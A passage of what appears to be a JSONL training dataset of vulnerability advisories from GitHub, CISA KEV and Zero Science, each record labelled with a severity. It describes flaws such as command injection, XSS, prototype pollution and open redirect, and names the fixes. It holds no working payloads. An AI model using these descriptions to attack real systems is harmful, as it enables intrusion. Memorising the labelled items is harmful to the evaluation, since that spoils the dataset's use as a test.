vulnerable to Command Injection. The package does not validate user input on the `kill` function. This may allow attackers to run arbitrary commands in the system if user input (such as the port number) is passed directly to the function.\n\n## Recommendation\n\nUpgrade to version 1.3.2 or later.", "text_raw": "Command Injection in kill-port\n\n[Severity: HIGH]\n\nVersions of `kill-port` prior to 1.3.2 are vulnerable to Command Injection. The package does not validate user input on the `kill` function. This may allow attackers to run arbitrary commands in the system if user input (such as the port number) is passed directly to the function.\n\n\n## Recommendation\n\nUpgrade to version 1.3.2 or later.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2019-03-25", "split": "train"} -{"id": "bf22f08637b69a1e8709", "text": "confinit vulnerable to prototype pollution\n\nconfinit through 0.3.0 is vulnerable to Prototype Pollution.The 'setDeepProperty' function could be tricked into adding or modifying properties of 'Object.prototype' using a '__proto__' payload.", "text_raw": "confinit vulnerable to prototype pollution\n\n[Severity: MEDIUM]\n\nconfinit through 0.3.0 is vulnerable to Prototype Pollution.The 'setDeepProperty' function could be tricked into adding or modifying properties of 'Object.prototype' using a '__proto__' payload.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2020-04-07", "split": "train"} -{"id": "ac47ea29fb1fef647537", "text": "Arbitrary Code Execution in handlebars\n\nVersions of `handlebars` prior to 3.0.8 or 4.5.3 are vulnerable to Arbitrary Code Execution. The package's lookup helper fails to properly validate templates, allowing attackers to submit templates that execute arbitrary JavaScript in the system. It is due to an incomplete fix for a [previous issue](https://www.npmjs.com/advisories/1316). This vulnerability can be used to run arbitrary code in a server processing Handlebars templates or on a victim's browser (effectively serving as Cross-Site Scripting).\n\n## Recommendation\n\nUpgrade to version 3.0.8, 4.5.3 or later.", "text_raw": "Arbitrary Code Execution in handlebars\n\n[Severity: HIGH]\n\nVersions of `handlebars` prior to 3.0.8 or 4.5.3 are vulnerable to Arbitrary Code Execution. The package's lookup helper fails to properly validate templates, allowing attackers to submit templates that execute arbitrary JavaScript in the system. It is due to an incomplete fix for a [previous issue](https://www.npmjs.com/advisories/1316). This vulnerability can be used to run arbitrary code in a server processing Handlebars templates or on a victim's browser (effectively serving as Cross-Site Scripting).\n\n\n## Recommendation\n\nUpgrade to version 3.0.8, 4.5.3 or later.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2020-09-04", "split": "train"} -{"id": "5854a45b40fbf60ba648", "text": "BEWARD N100 H.264 VGA IP Camera M2.1.6 Unauthenticated RTSP Stream Disclosure", "text_raw": "BEWARD N100 H.264 VGA IP Camera M2.1.6 Unauthenticated RTSP Stream Disclosure\n\nSeverity: medium", "severity": "medium", "severity_label": 1, "source": "zeroscience", "timestamp": "2019-02-04", "split": "train"} -{"id": "44f8e12c3b724940370d", "text": "ESTsoft ALPlayer 2.0 ASX Playlist File Handling Buffer Overflow Vulnerability", "text_raw": "ESTsoft ALPlayer 2.0 ASX Playlist File Handling Buffer Overflow Vulnerability\n\nSeverity: high", "severity": "high", "severity_label": 2, "source": "zeroscience", "timestamp": "2011-07-06", "split": "train"} -{"id": "28bed1e4c6d3c9e733a9", "text": "Arm Trusted Firmware Out-of-Bounds Write Vulnerability\n\nAffected: Arm Trusted Firmware\n\nArm Trusted Firmware contains an out-of-bounds write vulnerability allowing the non-secure (NS) world to trigger a system halt, overwrite secure data, or print out secure data when calling secure functions under the non-secure processing environment (NSPE) handler mode. This vulnerability affects Yealink Device Management servers.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-787\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "text_raw": "Arm Trusted Firmware Out-of-Bounds Write Vulnerability\n\nAffected: Arm Trusted Firmware\n\nArm Trusted Firmware contains an out-of-bounds write vulnerability allowing the non-secure (NS) world to trigger a system halt, overwrite secure data, or print out secure data when calling secure functions under the non-secure processing environment (NSPE) handler mode. This vulnerability affects Yealink Device Management servers.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-787\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "severity": "critical", "severity_label": 3, "source": "cisa_kev", "timestamp": "2021-11-03", "split": "train"} -{"id": "9029e081c23842869ed8", "text": "Command Injection in ungit\n\nVersions of `ungit` prior to 0.9.0 are affected by a command injection vulnerability in the `url` parameter.\n\n## Recommendation\n\nUpdate version 0.9.0 or later.", "text_raw": "Command Injection in ungit\n\n[Severity: CRITICAL]\n\nVersions of `ungit` prior to 0.9.0 are affected by a command injection vulnerability in the `url` parameter.\n\n\n## Recommendation\n\nUpdate version 0.9.0 or later.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-08-31", "split": "train"} -{"id": "c66e47a476ab79316580", "text": "TomatoCart 1.0.1 (json.php) Remote Cross-Site Scripting Vulnerability", "text_raw": "TomatoCart 1.0.1 (json.php) Remote Cross-Site Scripting Vulnerability\n\nSeverity: medium", "severity": "medium", "severity_label": 1, "source": "zeroscience", "timestamp": "2010-10-06", "split": "train"} -{"id": "2216710caa298892deee", "text": "Cross-Site Scripting bypass in html-purify\n\nAll versions of html-purify are vulnerable to cross-site scripting. The data attribute inside of object tags is not properly sanitized and allows javascript URIs leading to code execution.\n\nNo fix is currently available. Consider using an alternative package until a fix is made available.", "text_raw": "Cross-Site Scripting bypass in html-purify\n\n[Severity: HIGH]\n\nAll versions of html-purify are vulnerable to cross-site scripting. The data attribute inside of object tags is not properly sanitized and allows javascript URIs leading to code execution.\n\nNo fix is currently available. Consider using an alternative package until a fix is made available.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2020-12-04", "split": "train"} -{"id": "1e7279790b94a835868a", "text": "Microsoft Windows Media Center Remote Code Execution Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows Media Center contains a remote code execution vulnerability when Windows Media Center opens a specially crafted Media Center link (.mcl) file that references malicious code.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-20\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "text_raw": "Microsoft Windows Media Center Remote Code Execution Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows Media Center contains a remote code execution vulnerability when Windows Media Center opens a specially crafted Media Center link (.mcl) file that references malicious code.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-20\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "severity": "critical", "severity_label": 3, "source": "cisa_kev", "timestamp": "2021-11-03", "split": "train"} -{"id": "75f49213c6b30d5315c3", "text": "Electronic Arts Origin Client 9.5.5 Multiple Privilege Escalation Vulnerabilities", "text_raw": "Electronic Arts Origin Client 9.5.5 Multiple Privilege Escalation Vulnerabilities\n\nSeverity: medium", "severity": "medium", "severity_label": 1, "source": "zeroscience", "timestamp": "2015-02-26", "split": "train"} -{"id": "35bba5636dfe82c6c073", "text": "Remote code execution via the `pretty` option.\n\n### Impact\n\nIf a remote attacker was able to control the `pretty` option of the pug compiler, e.g. if you spread a user provided object such as the query parameters of a request into the pug template inputs, it was possible for them to achieve remote code execution on the node.js backend.\n\n### Patches\n\nUpgrade to `pug@3.0.1` or `pug-code-gen@3.0.2` or `pug-code-gen@2.0.3`, which correctly sanitise the parameter.\n\n### Workarounds\n\nIf there is no way for un-trusted input to be passed to pug as the `pretty` option, e.g. if you compile templates in advance before applying user input to them, you do not need to upgrade.\n\n### References\n\nOriginal report: https://github.com/pugjs/pug/issues/3312\n\n### For more information\n\nIf you believe you have found other vulnerabilities, please **DO NOT** open an issue. Instead, you can follow the instructions in our [Security Policy](https://github.com/pugjs/pug/blob/master/SECURITY.md)", "text_raw": "Remote code execution via the `pretty` option.\n\n[Severity: MEDIUM]\n\n### Impact\n\nIf a remote attacker was able to control the `pretty` option of the pug compiler, e.g. if you spread a user provided object such as the query parameters of a request into the pug template inputs, it was possible for them to achieve remote code execution on the node.js backend.\n\n### Patches\n\nUpgrade to `pug@3.0.1` or `pug-code-gen@3.0.2` or `pug-code-gen@2.0.3`, which correctly sanitise the parameter.\n\n### Workarounds\n\nIf there is no way for un-trusted input to be passed to pug as the `pretty` option, e.g. if you compile templates in advance before applying user input to them, you do not need to upgrade.\n\n### References\n\n\nOriginal report: https://github.com/pugjs/pug/issues/3312\n\n### For more information\n\nIf you believe you have found other vulnerabilities, please **DO NOT** open an issue. Instead, you can follow the instructions in our [Security Policy](https://github.com/pugjs/pug/blob/master/SECURITY.md)", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-03-03", "split": "train"} -{"id": "655029728b36f9e607d8", "text": "grunt-gh-pages before 0.10.0 may allow unencrypted GitHub credentials to be written to a log file\n\nVersions of `grunt-gh-pages` prior to 0.10.0 are affected by a vulnerability which may cause unencrypted GitHub credentials to be written to a log file in certain circumstances.\n\nIn the `grunt-gh-pages` deployment scenario where authentication is performed by injecting a GitHub token directly into the auth portion of the URL, `grunt-gh-pages` will write the token to a log file, unencrypted.\n\n## Recommendation\n\nUpdate to version 0.10.0 or later.", "text_raw": "grunt-gh-pages before 0.10.0 may allow unencrypted GitHub credentials to be written to a log file\n\n[Severity: MEDIUM]\n\nVersions of `grunt-gh-pages` prior to 0.10.0 are affected by a vulnerability which may cause unencrypted GitHub credentials to be written to a log file in certain circumstances.\n\nIn the `grunt-gh-pages` deployment scenario where authentication is performed by injecting a GitHub token directly into the auth portion of the URL, `grunt-gh-pages` will write the token to a log file, unencrypted.\n\n\n## Recommendation\n\nUpdate to version 0.10.0 or later.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2019-02-18", "split": "train"} -{"id": "e43647eef7f16c463f06", "text": "Arbitrary command execution on Windows via qutebrowserurl: URL handler\n\n### Impact\nStarting with qutebrowser v1.7.0, the Windows installer for qutebrowser registers it as a handler for certain URL schemes. With some applications such as Outlook Desktop, opening a specially crafted URL can lead to argument injection, allowing execution of qutebrowser commands, which in turn allows arbitrary code execution via commands such as `:spawn` or `:debug-pyeval`.\n\nOnly Windows installs where qutebrowser is registered as URL handler are affected. It does *not* have to be set as default browser for the exploit to work.\n\n### Patches\nThe issue has been fixed in [qutebrowser v2.4.0](https://github.com/qutebrowser/qutebrowser/releases/tag/v2.4.0) in commit 8f46ba3f6dc7b18375f7aa63c48a1fe461190430.\n\nThe fix also adds additional hardening for potential similar issues on Linux (by adding the new `--untrusted-args` flag to the `.desktop` file), though no such vulnerabilities are known.\n\nBackported patches for older versions are available, but no further releases are planned:\n\n- v1.7.x: d1ceaab\n- v1.8.x: ca7155d\n- v1.9.x: 157d871\n- v1.10.x: 94a6125\n- v1.11.x: 10acfbb\n- v1.12.x: 363a18f\n- v1.13.x: 410f262\n- v1.14.x: e4f4d93\n- v2.0.x: 15a1654\n- v2.1.x: 509ddf2\n- v2.2.x: 03dcba5\n- v2.3.x: 00a694c\n\n(commits are referring to qutebrowser/qutebrowser on GitHub)\n\n### Workarounds\nRemove qutebrowser from the default browser settings entirely, so that it does not handle any kind of URLs. Make sure to remove *all* handlers, including an (accidental) `qutebrowserURL` handler, e.g. using [NirSoft URLProtocolView](https://www.nirsoft.net/utils/url_protocol_view.html).\n\n### Timeline\n2021-10-15: Issue reported via security@qutebrowser.org by Ping Fan (Zetta) Ke of [Valkyrie-X Security Research Group (VXRL)](https://www.vxrl.hk/)\n2021-10-15: Issue confirmed by @The-Compiler (lead developer), author of installer (@bitraid) contacted for help/review\n2021-10-15: CVE assigned by GitHub\n2021-10-15 to 2021-10-17: Fix developed\n2021-10-17: Additional core developer (@toofar) contacted for help/review\n2021-10-21: v2.4.0 released containing the fix\n2021-10-21: Advisory and fix published\n\n### References\nSee the [commit message](https://github.com/qutebrowser/qutebrowser/commit/8f46ba3f6dc7b18375f7aa63c48a1fe461190430) for additional information and references to various similar issues in other projects.\n\n### Acknowledgements\nThanks to Ping Fan (Zetta) Ke of [Valkyrie-X Security Research Group](https://www.vxrl.hk/) (VXRL/@vxresearch) for finding and responsibly disclosing this issue.\n\n### Contact\nIf you have any questions or comments about this advisory, please email [security@qutebrowser.org](mailto:security@qutebrowser.org).", "text_raw": "Arbitrary command execution on Windows via qutebrowserurl: URL handler\n\n[Severity: HIGH]\n\n### Impact\nStarting with qutebrowser v1.7.0, the Windows installer for qutebrowser registers it as a handler for certain URL schemes. With some applications such as Outlook Desktop, opening a specially crafted URL can lead to argument injection, allowing execution of qutebrowser commands, which in turn allows arbitrary code execution via commands such as `:spawn` or `:debug-pyeval`.\n\nOnly Windows installs where qutebrowser is registered as URL handler are affected. It does *not* have to be set as default browser for the exploit to work.\n\n### Patches\nThe issue has been fixed in [qutebrowser v2.4.0](https://github.com/qutebrowser/qutebrowser/releases/tag/v2.4.0) in commit 8f46ba3f6dc7b18375f7aa63c48a1fe461190430.\n\nThe fix also adds additional hardening for potential similar issues on Linux (by adding the new `--untrusted-args` flag to the `.desktop` file), though no such vulnerabilities are known.\n\nBackported patches for older versions are available, but no further releases are planned:\n\n- v1.7.x: d1ceaab\n- v1.8.x: ca7155d\n- v1.9.x: 157d871\n- v1.10.x: 94a6125\n- v1.11.x: 10acfbb\n- v1.12.x: 363a18f\n- v1.13.x: 410f262\n- v1.14.x: e4f4d93\n- v2.0.x: 15a1654\n- v2.1.x: 509ddf2\n- v2.2.x: 03dcba5\n- v2.3.x: 00a694c\n\n(commits are referring to qutebrowser/qutebrowser on GitHub)\n\n### Workarounds\nRemove qutebrowser from the default browser settings entirely, so that it does not handle any kind of URLs. Make sure to remove *all* handlers, including an (accidental) `qutebrowserURL` handler, e.g. using [NirSoft URLProtocolView](https://www.nirsoft.net/utils/url_protocol_view.html).\n\n### Timeline\n2021-10-15: Issue reported via security@qutebrowser.org by Ping Fan (Zetta) Ke of [Valkyrie-X Security Research Group (VXRL)](https://www.vxrl.hk/)\n2021-10-15: Issue confirmed by @The-Compiler (lead developer), author of installer (@bitraid) contacted for help/review\n2021-10-15: CVE assigned by GitHub\n2021-10-15 to 2021-10-17: Fix developed\n2021-10-17: Additional core developer (@toofar) contacted for help/review\n2021-10-21: v2.4.0 released containing the fix\n2021-10-21: Advisory and fix published\n\n### References\nSee the [commit message](https://github.com/qutebrowser/qutebrowser/commit/8f46ba3f6dc7b18375f7aa63c48a1fe461190430) for additional information and references to various similar issues in other projects.\n\n### Acknowledgements\nThanks to Ping Fan (Zetta) Ke of [Valkyrie-X Security Research Group](https://www.vxrl.hk/) (VXRL/@vxresearch) for finding and responsibly disclosing this issue.\n\n### Contact\nIf you have any questions or comments about this advisory, please email [security@qutebrowser.org](mailto:security@qutebrowser.org).", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-10-22", "split": "train"} -{"id": "67b2fe47f648a421a604", "text": "Downloads Resources over HTTP in ntfserver\n\nAffected versions of `ntfserver` insecurely download an executable over an unencrypted HTTP connection.\n\nIn scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `ntfserver`.\n\n## Recommendation\n\nNo patch is currently available for this vulnerability.\n\nThe best mitigation is currently to avoid using this package, using a different package if available.\n\nAlternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees.", "text_raw": "Downloads Resources over HTTP in ntfserver\n\n[Severity: HIGH]\n\nAffected versions of `ntfserver` insecurely download an executable over an unencrypted HTTP connection. \n\nIn scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `ntfserver`.\n\n\n## Recommendation\n\nNo patch is currently available for this vulnerability.\n\nThe best mitigation is currently to avoid using this package, using a different package if available. \n\nAlternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2019-02-18", "split": "train"} -{"id": "1f13c69752fed14bb72f", "text": "Ivanti Pulse Connect Secure Collaboration Suite Buffer Overflow Vulnerability\n\nAffected: Ivanti Pulse Connect Secure\n\nIvanti Pulse Connect Secure Collaboration Suite contains a buffer overflow vulnerabilities that allows a remote authenticated users to execute code as the root user via maliciously crafted meeting room.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-94\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "text_raw": "Ivanti Pulse Connect Secure Collaboration Suite Buffer Overflow Vulnerability\n\nAffected: Ivanti Pulse Connect Secure\n\nIvanti Pulse Connect Secure Collaboration Suite contains a buffer overflow vulnerabilities that allows a remote authenticated users to execute code as the root user via maliciously crafted meeting room.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-94\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "severity": "critical", "severity_label": 3, "source": "cisa_kev", "timestamp": "2021-11-03", "split": "train"} -{"id": "8e460df976d71c929f06", "text": "Data races in hashconsing\n\nAffected versions of hashconsing implements Send/Sync for its HConsed type without restricting it to Sendable types and Syncable types. This allows non-Sync types such as Cell to be shared across threads leading to undefined behavior and memory corruption in concurrent programs.", "text_raw": "Data races in hashconsing\n\n[Severity: HIGH]\n\nAffected versions of hashconsing implements Send/Sync for its HConsed type without restricting it to Sendable types and Syncable types. This allows non-Sync types such as Cell to be shared across threads leading to undefined behavior and memory corruption in concurrent programs.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-08-25", "split": "train"} -{"id": "43f1dbde594c061fe034", "text": "ImageMagick Arbitrary File Deletion Vulnerability\n\nAffected: ImageMagick ImageMagick\n\nImageMagick contains an unspecified vulnerability that could allow users to delete files by using ImageMagick's 'ephemeral' pseudo protocol, which deletes files after reading.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-284\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "text_raw": "ImageMagick Arbitrary File Deletion Vulnerability\n\nAffected: ImageMagick ImageMagick\n\nImageMagick contains an unspecified vulnerability that could allow users to delete files by using ImageMagick's 'ephemeral' pseudo protocol, which deletes files after reading.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-284\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "severity": "critical", "severity_label": 3, "source": "cisa_kev", "timestamp": "2021-11-03", "split": "train"} -{"id": "5485f4b6090855469573", "text": "Cross-Site Scripting in Kaminari\n\n### Impact\nIn Kaminari before 1.2.1, there is a vulnerability that would allow an attacker to inject arbitrary code into pages with pagination links. This has been fixed in 1.2.1.\n\n### Releases\nThe 1.2.1 gem including the patch has already been released.\nAll past released versions are affected by this vulnerability.\n\n### Workarounds\nApplication developers who can't update the gem can workaround by overriding the `PARAM_KEY_EXCEPT_LIST` constant.\n\n```ruby\nmodule Kaminari::Helpers\n PARAM_KEY_EXCEPT_LIST = [:authenticity_token, :commit, :utf8, :_method, :script_name, :original_script_name].freeze\nend\n```\n\n### Credits\nThanks to Daniel Mircea for finding the issue and sending a patch via GitHub. Also thanks to Aditya Prakash for reporting the vulnerability.", "text_raw": "Cross-Site Scripting in Kaminari\n\n[Severity: MEDIUM]\n\n### Impact\nIn Kaminari before 1.2.1, there is a vulnerability that would allow an attacker to inject arbitrary code into pages with pagination links. This has been fixed in 1.2.1.\n\n### Releases\nThe 1.2.1 gem including the patch has already been released.\nAll past released versions are affected by this vulnerability.\n\n### Workarounds\nApplication developers who can't update the gem can workaround by overriding the `PARAM_KEY_EXCEPT_LIST` constant.\n\n```ruby\nmodule Kaminari::Helpers\n PARAM_KEY_EXCEPT_LIST = [:authenticity_token, :commit, :utf8, :_method, :script_name, :original_script_name].freeze\nend\n```\n\n### Credits\nThanks to Daniel Mircea for finding the issue and sending a patch via GitHub. Also thanks to Aditya Prakash for reporting the vulnerability.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2020-05-28", "split": "train"} -{"id": "7509b56a3e327f8a81c7", "text": "Huawei Technologies eSpace Meeting Service 1.0.0.23 Local Privilege Escalation", "text_raw": "Huawei Technologies eSpace Meeting Service 1.0.0.23 Local Privilege Escalation\n\nSeverity: medium", "severity": "medium", "severity_label": 1, "source": "zeroscience", "timestamp": "2014-03-10", "split": "train"} -{"id": "88ec97d2779ac7483746", "text": "Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Response Splitting') in Armeria\n\nVersions of Armeria 0.85.0 through and including 0.96.0 are vulnerable to HTTP response splitting, which allows remote attackers to inject arbitrary HTTP headers via CRLF sequences when unsanitized data is used to populate the headers of an HTTP response.\n\n### Impact\n\n1. Cross-User Defacement\n2. Cache Poisoning\n3. Cross-Site Scripting (XSS)\n4. Page Hijacking\n\n### Root Cause\n\nThe root cause is due to the usage of Netty without the HTTP header validation.\n\nhttps://github.com/line/armeria/blob/f0d870fde1088114070be31b67f7df0a21e835c6/core/src/main/java/com/linecorp/armeria/common/DefaultHttpHeaders.java#L23\n\n### Patches\n\nThis vulnerability has been patched in 0.97.0.\n\n### References\n\n[CWE-113: Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Response Splitting')](https://cwe.mitre.org/data/definitions/113.html)\nhttps://github.com/ratpack/ratpack/security/advisories/GHSA-mvqp-q37c-wf9j\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [GitHub](https://github.com/line/armeria/issues)", "text_raw": "Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Response Splitting') in Armeria\n\n[Severity: MEDIUM]\n\nVersions of Armeria 0.85.0 through and including 0.96.0 are vulnerable to HTTP response splitting, which allows remote attackers to inject arbitrary HTTP headers via CRLF sequences when unsanitized data is used to populate the headers of an HTTP response.\n\n### Impact\n\n1. Cross-User Defacement\n2. Cache Poisoning\n3. Cross-Site Scripting (XSS)\n4. Page Hijacking\n\n\n### Root Cause\n\nThe root cause is due to the usage of Netty without the HTTP header validation.\n\nhttps://github.com/line/armeria/blob/f0d870fde1088114070be31b67f7df0a21e835c6/core/src/main/java/com/linecorp/armeria/common/DefaultHttpHeaders.java#L23\n\n### Patches\n\nThis vulnerability has been patched in 0.97.0.\n\n### References\n\n[CWE-113: Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Response Splitting')](https://cwe.mitre.org/data/definitions/113.html)\nhttps://github.com/ratpack/ratpack/security/advisories/GHSA-mvqp-q37c-wf9j\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [GitHub](https://github.com/line/armeria/issues)", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2019-12-06", "split": "train"} -{"id": "c6b700cce490afb3b23e", "text": "Improper Input Validation in Spring Framework\n\nIn Spring Framework versions 5.2.0 - 5.2.8, 5.1.0 - 5.1.17, 5.0.0 - 5.0.18, 4.3.0 - 4.3.28, and older unsupported versions, the protections against RFD attacks from CVE-2015-5211 may be bypassed depending on the browser used through the use of a jsessionid path parameter.", "text_raw": "Improper Input Validation in Spring Framework\n\n[Severity: MEDIUM]\n\nIn Spring Framework versions 5.2.0 - 5.2.8, 5.1.0 - 5.1.17, 5.0.0 - 5.0.18, 4.3.0 - 4.3.28, and older unsupported versions, the protections against RFD attacks from CVE-2015-5211 may be bypassed depending on the browser used through the use of a jsessionid path parameter.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-04-30", "split": "train"} -{"id": "ea550bcd04f4683da9db", "text": "Open Redirect in github.com/AndrewBurian/powermux\n\n### Impact\nAttackers may be able to craft phishing links and other open redirects by exploiting the trailing slash redirection feature. This may lead to users being redirected to untrusted sites after following an attacker crafted link.\n\n### Patches\nThe issue is resolved in v1.1.1\n\n### Workarounds\nThere are no existing workarounds.\nYou may detect attempts to craft urls that exploit this feature by looking for request paths containing pairs of forward slashes in sequence combined with a trailing slash e.g. `https://example.com//foo/`", "text_raw": "Open Redirect in github.com/AndrewBurian/powermux\n\n[Severity: MEDIUM]\n\n### Impact\nAttackers may be able to craft phishing links and other open redirects by exploiting the trailing slash redirection feature. This may lead to users being redirected to untrusted sites after following an attacker crafted link.\n\n### Patches\nThe issue is resolved in v1.1.1\n\n### Workarounds\nThere are no existing workarounds.\nYou may detect attempts to craft urls that exploit this feature by looking for request paths containing pairs of forward slashes in sequence combined with a trailing slash e.g. `https://example.com//foo/`\n", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-07-01", "split": "train"} -{"id": "58a4332876e48ba8626f", "text": "SQL Injection in Geocoder\n\nsql.rb in Geocoder before 1.6.1 allows Boolean-based SQL injection when `within_bounding_box` is used in conjunction with untrusted `sw_lat`, `sw_lng`, `ne_lat`, or `ne_lng` data.", "text_raw": "SQL Injection in Geocoder\n\n[Severity: CRITICAL]\n\nsql.rb in Geocoder before 1.6.1 allows Boolean-based SQL injection when `within_bounding_box` is used in conjunction with untrusted `sw_lat`, `sw_lng`, `ne_lat`, or `ne_lng` data.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-06-10", "split": "train"} -{"id": "7a92b68026669a16b56c", "text": "BlueControl 3.5 SR5 Insecure Library Loading Arbitrary Code Execution", "text_raw": "BlueControl 3.5 SR5 Insecure Library Loading Arbitrary Code Execution\n\nSeverity: high", "severity": "high", "severity_label": 2, "source": "zeroscience", "timestamp": "2016-01-19", "split": "train"} -{"id": "665d3c4405fd34801792", "text": "Google Chromium Intents Improper Input Validation Vulnerability\n\nAffected: Google Chromium Intents\n\nGoogle Chromium Intents contains an improper input validation vulnerability that allows a remote attacker to arbitrarily browser to a malicious URL via a crafted HTML page. This vulnerability could affect multiple web browsers that utilize Chromium, including, but not limited to, Google Chrome, Microsoft Edge, and Opera.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-20\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "text_raw": "Google Chromium Intents Improper Input Validation Vulnerability\n\nAffected: Google Chromium Intents\n\nGoogle Chromium Intents contains an improper input validation vulnerability that allows a remote attacker to arbitrarily browser to a malicious URL via a crafted HTML page. This vulnerability could affect multiple web browsers that utilize Chromium, including, but not limited to, Google Chrome, Microsoft Edge, and Opera.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-20\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "severity": "critical", "severity_label": 3, "source": "cisa_kev", "timestamp": "2021-11-03", "split": "train"} -{"id": "a6f631107fc09fb4c36c", "text": "auth0-lock vulnerable to XSS via unsanitized placeholder property\n\n## Overview\n\nAuth0 Lock version 11.20.4 and earlier did not properly sanitize the generated HTML code. Customers using the `additionalSignUpFields` customization option to add a checkbox to the sign-up dialog that are passing a `placeholder` property obtained from an untrusted source (e.g. a query parameter) could allow cross-site scripting (XSS) on their signup pages.\n\n## Am I affected?\n\nYou are affected by this vulnerability if all of the following conditions apply:\n\n- You are using Auth0 Lock version 11.20.4 or earlier.\n- You pass `additionalSignUpFields` as options when initializing Lock which includes a field of type `checkbox` whose `placeholder` value is obtained from an untrusted source.\n\nAn example of a vulnerable snippet is the following where the `placeholder` value is partially user-controlled by the `name` query parameter:\n\n```javascript\n\n```\n\n## How to fix that?\n\nDevelopers using Auth0’s signin solution Lock need to upgrade to version 11.21.0 or later. Version 11.21.0 introduces two changes:\n\n1. The existing `placeholder` property is now treated as plain text to mitigate the problem.\n2. A new `placeholderHTML` property is introduced that indicates the level of control it provides and that it should be only supplied from trusted sources.\n\n## Will this update impact my users?\n\nThis fix patches the Auth0 Lock widget and may require changes in application code, but it will not impact your users, their current state, or any existing sessions.\n\nDevelopers using the `placeholder` property with HTML content from a trusted source should start using the `placeholderHTML` property to continue providing the same user experience.", "text_raw": "auth0-lock vulnerable to XSS via unsanitized placeholder property\n\n[Severity: MEDIUM]\n\n## Overview\n\nAuth0 Lock version 11.20.4 and earlier did not properly sanitize the generated HTML code. Customers using the `additionalSignUpFields` customization option to add a checkbox to the sign-up dialog that are passing a `placeholder` property obtained from an untrusted source (e.g. a query parameter) could allow cross-site scripting (XSS) on their signup pages.\n\n## Am I affected?\n\nYou are affected by this vulnerability if all of the following conditions apply:\n\n- You are using Auth0 Lock version 11.20.4 or earlier.\n- You pass `additionalSignUpFields` as options when initializing Lock which includes a field of type `checkbox` whose `placeholder` value is obtained from an untrusted source.\n\nAn example of a vulnerable snippet is the following where the `placeholder` value is partially user-controlled by the `name` query parameter:\n\n```javascript\n\n```\n\n## How to fix that?\n\nDevelopers using Auth0’s signin solution Lock need to upgrade to version 11.21.0 or later. Version 11.21.0 introduces two changes:\n\n1. The existing `placeholder` property is now treated as plain text to mitigate the problem.\n2. A new `placeholderHTML` property is introduced that indicates the level of control it provides and that it should be only supplied from trusted sources.\n\n## Will this update impact my users?\n\nThis fix patches the Auth0 Lock widget and may require changes in application code, but it will not impact your users, their current state, or any existing sessions.\n\nDevelopers using the `placeholder` property with HTML content from a trusted source should start using the `placeholderHTML` property to continue providing the same user experience.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2020-01-31", "split": "train"} -{"id": "b74422e81f3dd143ea61", "text": "KYOCERA Net Admin 3.4 CSRF Add Admin Exploit", "text_raw": "KYOCERA Net Admin 3.4 CSRF Add Admin Exploit\n\nSeverity: medium", "severity": "medium", "severity_label": 1, "source": "zeroscience", "timestamp": "2018-04-07", "split": "train"} -{"id": "246bf01dac978a25b823", "text": "Oracle MySQL Eventum 2.3 Remote Script Insertion Vulnerabilities", "text_raw": "Oracle MySQL Eventum 2.3 Remote Script Insertion Vulnerabilities\n\nSeverity: medium", "severity": "medium", "severity_label": 1, "source": "zeroscience", "timestamp": "2011-02-11", "split": "train"} -{"id": "bc23f1c0b1f56ea5f744", "text": "HTTP Request Smuggling: LF vs CRLF handling in Waitress\n\n### Impact\n\nWaitress implemented a 